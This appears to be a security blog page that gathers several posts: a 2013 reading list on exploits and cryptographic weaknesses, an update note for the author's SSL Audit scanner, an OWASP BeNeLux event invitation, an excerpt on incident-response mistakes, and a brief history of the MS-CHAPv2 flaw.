Interesting Reads - Week 12 / 2013

• Binary Instrumentation for Exploit Analysis Purposes (part 1)
• Binary Instrumentation for Exploit Analysis Purposes (part 2)
  Using the PIN instrumentalisation framework to analyse exploits
• Randomly failed! Weaknesses in Java Pseudo Random Number Generators (PRNGs)
• FBI Secretly Spying on Cloud Computer Users FISMA/PATRIOTACT - "National Security Letters"
• New collision attacks on SHA-1 - based on optimal joint local-collision analysis [PDF]
• Port scanning /0 using insecure embedded devices
  How a group of poeple compromised thousand of devices and then used them to scan the whole internet. Beware : Ethical boundaries scratched
• "APT PDFs and metadata extraction"
• Research Data to Help Understand the ROI of Your Security Investments - Cloud Computing
  Let's say we welcome the attempt to get us data...
• Two new attacks on SSL decrypt authentication cookies | Ars Technica 

Food for thought 

I have updated my little TLS/SSL Scanner called "SSL Audit" to version 0.8. I tweaked it slightly but the tool is still based on it's own rudimentary SSL Engine and hence is not limited by the number of ciphersuites and protocols available to OpenSSL or NSS.

By the way I am still a little bit proud of the SSL Stack fingerprinting feature. I haven't updated it recently but it still seems to work out nicely. Try it out and let me know, especially if you have access to less known ssl stacks.

Changes

• Added support for TLS 1.2 CAMELIA ciphersuites;
• Speed up SSLv2 enumeration;
• Added the complete range of ARIA ciphersuites (http://tools.ietf.org/html/draft-nsri-tls-aria-00)

SSL Audit v.08

Download

You can download the tool here | VT scan

I would like to invite you to this years OWASP BeNeLux Event, I won't give a talk this year but I happily invite you as part of OWASP BeNeLux Program Committee:

Quick Facts

• Date : 29-30 Novembre 
• Location: Leuven (Belgium)
• Price : Free
• Places : Limited (First registered, First serve)
• Register here
• Conference Schedule
• Training Schedule

Agenda

The agenda is a sound mix between Application Security, Forensics,  Risk Management and represents the current security landscape at large rather well: Building security into Applications in Enterprises, Managing Application Level Vulnerabilities, Source code review on a large scale. It also has 2 innovative talks on exploit mitigation and sandboxing javascript. 

• Browser Security - John Wilander
• Sandboxing Javascript -  Lieven Desmet
• Body Armor for Binaries - Asia Slowinska 
• Forensics - Marc Hullegie and Kees Mastwijk 
• Streamlining Application Vulnerability Management: Communication Between Development and Security Teams  - Dan Cornell 
• Code review for Large Companies - Ruediger Bachmann
• Making Security Invisible by Becoming the Developer’s Best Friends - Dinis Cruz
• OWASP Top 10 vs Drupal - Erwin Geirnaert
• Panel Discussion about the legal aspects of penetration testing

Especially the talk about javascript sandboxing (JSand) has all my attention as it represent an interesting challenge that is hard to get right knowing the context within which javascript operates. It claims to be complete, requiring no Browser modifications and enforced client-side. The talk will also given at ASAC 2012 

Venue

Both the training day and the conference day take place at:

KU Leuven (University of Leuven)
iMinds-DistriNet Research Group
Celestijnenlaan 200A
B-3001 Heverlee
How to get there: http://distrinet.cs.kuleuven.be/about/route/
Hotel details: https://www.owasp.org/index.php?title=BeNeLux_OWASP_Day_2012#tab=Venue

[ Updated : Added  "10 Common Mistakes of Incident Responders" at the bottom]

The following post will brake one major rule I adhere to  when blogging, a post shall have not more than 10% of content that is not authored by myself. The content of this post resonated so well with me however that I decided to make an exception.

The following is attributed to Alit-Reza Anghaie a.k.a Packetknife.com. For those of you in similar situations I can only warmly recommend to consider and follow the advice. The emphasis is mine.

[Start of Excerpt] 

Alit-Reza Anghaie

I've had a fairly long and quite unintentional career in InfoSec ranging from Academic to Entertainment to Defense. Along the way a lot of mistakes were made or observed. This post marks the first in many installments to share lack of foresight turned into a graying face ghillie.

I'm not quite sure of the right format but I'm going with a Top Twenty - so I'll keep on the biggest pain points as I see them.

Read more »

A post within the "straight to the meat" category :

There was a talk at Defcon 20 entitled "Defeating PPTP VPNs and WPA2 Enterprise with MS-CHAPv2", by Moxie and David Hulton - the talk announced the implementation of a tool that reduced the security of MS-CHAPv2 to the strength of a single DES encryption.

This post gives a quick rundown with references on what you need to know, enjoy - Thierry




History :
1999 - Bruce Schneier and Mudge document the vulnerability [2]
2011 - Sogeti releases POC performing the same attack against MS-CHAPv2 [4]
2012 - Defcon Talk detailing the flaw and  release of SAAS to crack the key within 23hours [3]

Read more »